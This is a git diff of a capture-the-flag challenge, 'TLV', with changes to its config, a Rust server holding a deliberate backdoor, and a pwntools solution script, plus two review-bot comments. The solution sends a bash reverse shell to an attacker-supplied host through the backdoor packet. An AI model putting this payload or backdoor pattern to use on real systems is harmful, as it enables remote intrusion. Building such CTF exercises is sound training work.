diff --git a/reverse/TLV/challenge.yml b/reverse/TLV/challenge.yml
index 5b809a1..b74de0a 100644
--- a/reverse/TLV/challenge.yml
+++ b/reverse/TLV/challenge.yml
@@ -7,7 +7,7 @@ description: |
 As an engineer for Andromeda, you are entrusted with the pivotal task of deciphering "Technological Labyrinth Vanguard", an obscure and long-forgotten network protocol embedded within the critical systems of Project Echo, the clandestine project spearheaded by OrionTech. Suspected to harbor vulnerabilities, TLV poses a significant threat to The Andromeda Initiative's mission to dismantle Project Echo and neutralize their nemesis. Your objective is to reverse engineer of TLV, identify its weaknesses, and devise a strategy to exploit them, thus crippling Project Echo and securing victory for The Andromeda Initiative.
 value: 500
-type: dynamic_docker
+type: dynamic_docker
 extra:
 initial: 500
 minimum: 100
@@ -28,5 +28,5 @@ files:
 - "public/Dockerfile"
 - "public/flag.txt"
-state: visible
+state: hidden
 version: "0.1"
diff --git a/reverse/TLV/setup/main.rs b/reverse/TLV/setup/main.rs
index c953347..67c2635 100644
--- a/reverse/TLV/setup/main.rs
+++ b/reverse/TLV/setup/main.rs
@@ -14,22 +14,10 @@ struct TLVPacket {
 }
 impl TLVPacket {
- fn new(packet_type: u32, length: u32, mut value: Vec) -> Self {
- // Truncate the value if its length exceeds the specified length
- if value.len() > length as usize {
- value.truncate(length as usize);
- }
-
- TLVPacket {
- packet_type,
- length,
- value,
- }
- }
 fn from_bytes(bytes: &[u8]) -> Option {
 let len = bytes.len();
- if bytes.len() < TYPE_LENGTH + LENGTH_LENGTH {
+ if len < TYPE_LENGTH + LENGTH_LENGTH {
 return None;
 }
@@ -47,7 +35,7 @@ impl TLVPacket {
 bytes[4],
 ]) as usize;
- if bytes.len() < TYPE_LENGTH + LENGTH_LENGTH + length {
+ if len != TYPE_LENGTH + LENGTH_LENGTH + length {
 return None;
 }
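Review bot: The `len != TYPE_LENGTH + LENGTH_LENGTH + length` check turns from_bytes into an exact-size parser, but nothing in the hunk records that contract; a caller that hands it a raw socket read buffer (the reader is outside this diff) will get None for a coalesced or partial read rather than a truncated packet. The comparison is the right place to bound the wire-supplied `length` against the real slice before it is used for slicing, so keep it and state the contract above it: `// Exact match: the slice must hold exactly one packet; a short or coalesced read is rejected, not truncated.` With `new` and its truncation removed in the previous hunk, from_bytes is the only visible constructor, so this check is also what keeps `length` and `value.len()` consistent. from_bytes begins in the previous hunk and continues past the end of this one.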
@@ -99,7 +87,7 @@ impl TLVPacket {
 }
 fn handle_echo_packet(value: &[u8]) -> Vec {
- let mut response = value.to_vec();
+ let response = value.to_vec();
 unsafe {
 if response.len() == 4 && u32::from_be_bytes([response[3], response[2], response[1], response[0]]) == 0xdeadbeef {
 BACKDOOR_TRIGGER += 1;
@@ -168,7 +156,7 @@ fn handle_client(mut stream: TcpStream) {
 println!("Client disconnected");
 unsafe {
 BACKDOOR_TRIGGER = 0;
- }
+ }
 return;
 }
 }
diff --git a/reverse/TLV/setup/tlv b/reverse/TLV/setup/tlv
old mode 100644
new mode 100755
index acbd0d4..363f4cc
Binary files a/reverse/TLV/setup/tlv and b/reverse/TLV/setup/tlv differ
diff --git a/reverse/TLV/sol/sol.py b/reverse/TLV/sol/sol.py
index af5e26c..60a1527 100644
--- a/reverse/TLV/sol/sol.py
+++ b/reverse/TLV/sol/sol.py
@@ -1,20 +1,23 @@
 from pwn import *
+
 def send_packet(packet_type, length, value):
 packet = p32(packet_type) + p32(length) + value
 return packet
+
 def run():
 if args.GDB:
 return gdb.debug(elf.path, gdbscript=gs)
 elif args.R:
- HOST = args.R.split(':')[0]
- PORT = args.R.split(':')[1]
+ HOST = args.R.split(":")[0]
+ PORT = args.R.split(":")[1]
 return remote(HOST, PORT)
 else:
 return process(elf.path)
-conn= run()
+
+conn = run()
 # Craft and send packets to trigger the backdoor function
 # Type 0x4 echo packet to increment the backdoor_trigger
@@ -27,13 +30,13 @@ def run():
 conn.send(echo_packet)
 # # Craft and send a backdoor packet to execute "cat flag.txt"
-LHOST = args.ATTACKER.split(':')[0]
-LPORT = args.ATTACKER.split(':')[1]
+LHOST = args.ATTACKER.split(":")[0]
+LPORT = args.ATTACKER.split(":")[1]
 cmd = args.CMD
-cmd = f'/bin/bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1'
+cmd = f"/bin/bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1"
-backdoor_packet = send_packet(0x4, 12, cmd.encode())
+backdoor_packet = send_packet(0x4, len(cmd), cmd.encode())
 conn.send(backdoor_packet)
 conn.interactive()
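Review bot: `BACKDOOR_TRIGGER += 1` is an unsynchronized read-modify-write on a `static mut`; if handle_client serves connections on separate threads (not visible in this diff), two clients can race on the counter, and current toolchains warn on every reference to a `static mut`. Declaring it `static BACKDOOR_TRIGGER: AtomicU32 = AtomicU32::new(0);` (with `use std::sync::atomic::{AtomicU32, Ordering};`) and writing `BACKDOOR_TRIGGER.fetch_add(1, Ordering::SeqCst);` here and `BACKDOOR_TRIGGER.store(0, Ordering::SeqCst);` in the handle_client hunk below removes both `unsafe` blocks without changing behaviour. The byte-reversed `u32::from_be_bytes([response[3], response[2], response[1], response[0]])` is simply a little-endian read guarded by the `len() == 4` check; `u32::from_le_bytes([response[0], response[1], response[2], response[3]])` says that directly. handle_echo_packet continues past the end of this hunk.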